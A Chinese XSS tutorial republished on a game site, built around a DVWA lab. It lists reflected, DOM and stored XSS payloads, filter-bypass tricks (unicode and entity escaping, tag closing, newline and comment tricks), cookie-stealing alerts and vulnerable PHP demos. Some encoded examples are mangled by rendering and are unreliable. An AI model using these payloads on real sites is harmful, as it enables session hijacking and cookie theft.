XSS 跨站脚本攻击总结

XSS 跨站脚本攻击总结

首页角色扮演代号乂体验服更新时间:2024-04-29
漏洞起因

可以输入的地方没有做好对应的过滤,引发的xss攻击

漏洞危害
  1. 盗取cookie
  2. 劫持用户浏览器
  3. 钓鱼攻击
  4. 挂马
  5. 在一定的条件下可以getshell
  6. 会话劫持
漏洞类型
  1. 反射型XSS(危险级别:低),插入的语句停留在当前页面。
  2. DOM型XSS (危险级别:中), DOM型xss又分为两种 (a.可见型、b.不可见型), 插入的语句影响js 。
  3. 存储型XSS(危险级别:高),插入的语句保存在数据库 。
  4. 其他型XSS(例如:Flash xss)。
漏洞实验

本次实验我们以著名的安全脆弱性平台DVWA为例:

在low级别下的测试,没有任何防御。可以插入任意标签如:

<script>alert('yuan')</script> <img src=1 onerror=alert(1)> <a href="javascript:alert(1)"> <input type="text" onclick="alert(1)">

如果过滤了alert()如何绕过呢?

直接上后端PHP代码:

<?php $name=$_POST['name']; $guanjianzi="alert"; $q=str_replace("alert"," ",$name); echo $q; ?>

前端显示html代码如下:

<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>Demo1</title> </head> <body> <h1>输入你的名称</h1> <form method="POST" action="demo1.php"> 输入:<input type="text" name="name"> <input type="submit">提交</form> </form> </body> </html>

当输入alert的时候就会被替换成空,当然我们可以使用其他的什么标签来代替script,但是如果只用script如何绕过呢?使用js转义。将alert转义。

当js解释器在标识符名称(例如函数名,属性名等等)中遇到unicode编码会进行解码,并使其标志符照常生效。而在字符串中遇到unicode编码时会进行解码只会被当作字符串。

也就是说unicode编码只能编码属性名

示例payload如下:

<script>alert(1)</script>

经过js转义后,代码如下:

<script>\u0061\u006c\u0065\u0072\u0074(1)</script>

payload成功执行alert

注意:使用unicode编码之前要确定对方有没有过滤“\”

html转义:

当浏览器接受到一份HTML代码后,会对标签之间(<p>xxx</p>等,<script>除外)、标签的属性中(<a href='xxxx'>)进行实体字符解码变为相应的字符,而不会发挥出其本来该有的功能,如:<被解码为<后仅被当作字符,而不会被当成标签名的起始。既然是字符串,那在href='xx'这些属性值本来就是字符串的地方可以作为一种可能的绕过的手段,JS字符串中,字符还可以表示为unicode的形式

源payload:

<a href="javascript:alert(1)">s</a>

转义后:

<a href="javascript:alert(1)">s</a>

输出在<script></script>之间的情况:

<?php $name=$_POST['name']; $guanjianzi="alert"; $q=str_replace("alert"," ",$name); $c="<script>var w=[$q]$q;</script>"; echo $c; #echo " <script>var a=[ ];</script><script>alert(1)</script><script>b=[ ]</script>"; /* <script>var a=[ ];</script><script>alert(1)</script><script>b=[ ]</script> * */ #echo "<script> var a=[]</script><script>alert(1)</script><script>var a=[];document.write(a);</script>"; ?>

绕过:

]</script><script>\u0061\u006c\u0065\u0072\u0074(1)</script><script> //闭合对应前后script标签

输出在html属性里面,假设输出在input标签里面

<?php $name=$_POST['name']; $guanjianzi="alert"; $q=str_replace("alert"," ",$name); $c="<input value='$q'>"; echo $c; #echo " <script>var a=[ ];</script><script>alert(1)</script><script>b=[ ]</script>"; /* <script>var a=[ ];</script><script>alert(1)</script><script>b=[ ]</script> * */ #echo "<script> var a=[]</script><script>alert(1)</script><script>var a=[];document.write(a);</script>"; ?>

绕过:

1' onclick='alert(1)

假设输出在img标签里:

<?php $name=$_POST['name']; $guanjianzi="alert"; $q=str_replace("alert"," ",$name); $c="<img src='$q'>"; echo $c; #echo "<img src='' onerror='alert(1)'>"; #echo " <script>var a=[ ];</script><script>alert(1)</script><script>b=[ ]</script>"; /* <script>var a=[ ];</script><script>alert(1)</script><script>b=[ ]</script> * */ #echo "<script> var a=[]</script><script>alert(1)</script><script>var a=[];document.write(a);</script>"; ?>

绕过:

'1/**/onerror='alert(1)

输出在标签里的绕过总结:

  1. 先想办法闭合周围的什么双引号之类的东西
  2. 判断有什么过滤掉的,如果没有过滤自然最好
  3. 查询标签对应可以执行js的属性,然后插入代码即可

DOM型xss分为两种:

  1. 可见型DOM xss
  2. 不可见型DOM xss

何为DOM?,你插入的代码会暂存在某些标签之中,并且影响输出。

DVWA的DOM xss就是不可见类型。

源代码不可见:

但是F12可见:

low级无任何防御直接插入payload:

medimu级过滤了script:

使用:</select><img src=1 onerror=alert(1)> //要闭合select标签,因为img在select标签里面是不可见的

high级对default进行了判断:

<?php // Is there any input? if ( array_key_exists( "default", $_GET ) && !is_null ($_GET[ 'default' ]) ) { /*判断是否有default这个键名和传的GETdefault参数不为null*/ # White list the allowable languages switch ($_GET['default']) { /*判断default是否为三个的其中一个,如果不是则重新设置header头,302跳转*/ case "French": case "English": case "German": case "Spanish": # ok break; default: header ("location: ?default=English"); exit; } } ?>

使用#*掉判断:

#<script>alert(1)</script>

存储型xss:当我们插入的恶意代码都会保留在数据库,下次在访问此页面的时候就会自动执行js。

温馨提示:用beef来配置存储型xss是个不错的选择哦!

总结:

xss漏洞起因 没有做好对应的过滤标签措施,导致攻击者可以注入恶意代码 对付那种无任何过滤的 <img src=1 onerror=alert(document.cookie)> <script>alert("xss")</script> <script>eval(alert('xss'))</script> <a href="javascript:localhoin=alert(1)">GO</a> 输出在<script></script>之间的情况(意思就是你在script里面,得把前面的闭合了在注入语句,然后因为你在script里面直接输入语句即可) 先闭合上一个script然后在注入恶意代码:</script><script>alert("xss") 如果<,>,/等符号被过滤了可以用:eval(alert(1)) #eval()函数用于直接执行代码 参考:http://www.runoob.com/jsref/jsref-eval.html 输出在其他标签里面 注意:html转义后在标签的属性中会其到一定的绕过作用 参考文章:https://www.cnblogs.com/iceli/p/8598709.html  当浏览器接受到一份HTML代码后,会对标签之间(<p>xxx</p>等,<script>除外)、标签的属性中(<a href='xxxx'>)进行实体字符解码变为相应的字符,而不会发挥出其本来该有的功能,如:<被解码为<后仅被当作字符,而不会被当成标签名的起始。既然是字符串,那在href='xx'这些属性值本来就是字符串的地方可以作为一种可能的绕过的手段。如: <a href="javascript:alert(1)"></a> 如在<input>里,解决办法:<input type="text" value="" onclick="alert(1)"> 出现在a标签的href里面,类似于:<a href="javascript:wds=''http://www.dddd.com".getElementById('ddd').value '&g=<你输入的值>'> 由于在href里面,可以使用javascript。就构造<a href="javascript:wds=''http://www.dddd.com".getElementById('ddd').value '&g=alert(1)'> 如果单引号等字符被过滤的话,使用:<a href="javascript:wds=''http://www.dddd.com".getElementById('ddd').value '&g=alert(1)'> //实体化被过滤的符号 宽字节xss: 如果页面用了gbk编码的话,可以用对应的编码进行编码被过滤的符号导致可以绕过过滤 空格被实体化过滤 注解:javascript的注释符为/**/ , // 当空格被过滤后,使用注释符来绕过。例子: location.href="........." "&ss=aaaa\" "&from==1;function/**/from(){}//" "¶m="; location.href="........." "&ss=aaaa\" "&from==1;alert(1);function/**/from(){}//" "¶m="; 学到的js的一个特性:javascript会先解析函数在解析其他 例子: a(); function as() {} 而js执行顺序是: function as() {} a(); 当输入的语句出现在注释里 (有机可乘的xss) 当输入的语句出现在js注释的源码的时候,加一个换行符就能引发xss 例如:http://xxx.com/jj.php?xxx=aaaaa <script> //function A() { // var g=getElementById(demo).value; // document.write(g); //} //document.write(你输入的) document.write("wwww") ; </script> 构造的xss语句:http://xxx.com/jj.php?xxx= alert(1) //) #通过 换行符,换到了没有注释的下一行然后闭合掉后面的括号 使用反斜杆构造xss 当输入的语句处于多行js代码之中,使用\分开,例子: <script>getTop().location.href="/cgi-bin/loginpage?autologin=n&errtype=1&verify=&clientuin=" "&t=" "&alias=" "®alias=" "&delegate_url=/cgi-bin/frame_html?url=%2Fcgi-bin%2Fsetting10%3Faction%3Dlist%26t%3Dsetting10%26ss%3Dindex%26Mtype%3D1%26clickpos%3D20%26loc%3Ddelegate%2Cwebmap%2C%2C1" "&title=" "&url=/cgi-bin/login?vt=passport&ss=aaa%22&from=bbb\&delegate_url=%2Fcgi-bin%2Fframe_html%3Furl%3D%25252Fcgi-bin%25252Fsetting10%25253Faction%25253Dlist%252526t%25253Dsetting10%252526ss%25253Dindex%252526Mtype%25253D1%252526clickpos%25253D20%252526loc%25253Ddelegate%25252Cwebmap%25252C%25252C1" "&org_fun=" "&aliastype=" "&ss=aaa" "&from=bbb" "¶m=" "&sp=6fa57ce5b3047ebMTM1NTQwOTA2Mg" "&r=3ec785174fff5206ed6f0cf4a8c5e3c5" "&ppp=" "&secpp="</script> 使用\分割语句然后想办法闭合 :反弹xss一般出现在url拦 DOM型xss DOM型的xss就是通过输入,改变了js代码的一部分。dom型xss又分两种: 1.可见型DOM xss,输入的东西改变了页面的源码。但是F12查看源码可见 类似于: <strong id="titleshow">按职业1检索:aaaaaaa </strong></div> <script> if("aaaaaaa"=="") document.getElementById("titleshow").innerHTML="按地区检索:全部明星"; if("职业1"=="职业1") document.getElementById("titleshow").innerHTML="按职业检索:aaaaaaa"; if("职业1"=="职业2") document.getElementById("titleshow").innerHTML="按职业检索:aaaaaaa"; if("职业1"=="职业3") document.getElementById("titleshow").innerHTML="按职业检索:aaaaaaa"; </script> aaaaa为我们输入的,假设现在<,>被过滤了。但是\没被过滤,该如何构造xss呢 由于\没有被过滤,使用unicode编码<和>,变为 被url解释器解释完后为<a href="javascript:alert(1)"></a>,url中出现了javascript:,指明了后面的语句要当作js执行,所以再次把解释后的字符交给js解释器解释,可以弹窗。 当js解释器在标识符名称(例如函数名,属性名等等)中遇到unicode编码会进行解码,并使其标志符照常生效。而在字符串中遇到unicode编码时会进行解码只会被当作字符串。如: <script>\u0061\u006c\u0065\u0072\u0074(1)</script> unicode编码在标签的属性之中可用,如果在输出使用不会影响上下文 参考文章:https://www.cnblogs.com/iceli/p/8598709.html 2.不可见型DOM xss 类似于DVWA里的DOM型xss,只能用调试工具定位。审核源代码是看不见的 记录一些DOM型xss常用的语句: 在iframe中执行js:<iframe onload="alert(1)"></iframe> <iframe src="javascript:alert(1)"></iframe> <iframe src="vbscript:msbox(1)"></iframe> IE执行VBScript代码 <iframe src="data:text/html"><script>alert(1)</script> chrome执行data协议代码 <iframe src="data:text/html,<script>alert(1)</script>"></iframe> 上面的变体 <iframe srcdoc="<script>alert(1)</script>"></iframe> chrome下的srcdoc属性 总结:在探测一个地方是否有xss的时候,插入好搜索的语句例如:aaaaaa。然后f12源码搜索,分析出现的地方,看看哪里能实现xss。如果有被过滤 了,先试试html转义,注意闭合。当\符号没被过滤的时候可以使用unicode编码来进行代替被过滤的函数或符号 (前提是在script标签里) 存储型xss: 一定要记住本节最开头的话,存储型XSS,输出的位置不一定出现在输入的位置。 7. 因而我们有时候需要逆向的思维,来寻找存储型XSS。大概思路如下: 7.1 先找到输出点,然后猜测此处输出是否会被过滤。 7.2 如果觉得可能没过滤,我们再找到这个输出是在哪里输入的。 7.3 接着开始测试输入,看输出的效果。 7.4 如果没过滤,那么你就成功了,否则你可以放弃掉它。 xss 存储型payload:http://html5sec.org/

查看全文
大家还看了
也许喜欢
更多游戏

Copyright © 2024 妖气游戏网 www.17u1u.com All Rights Reserved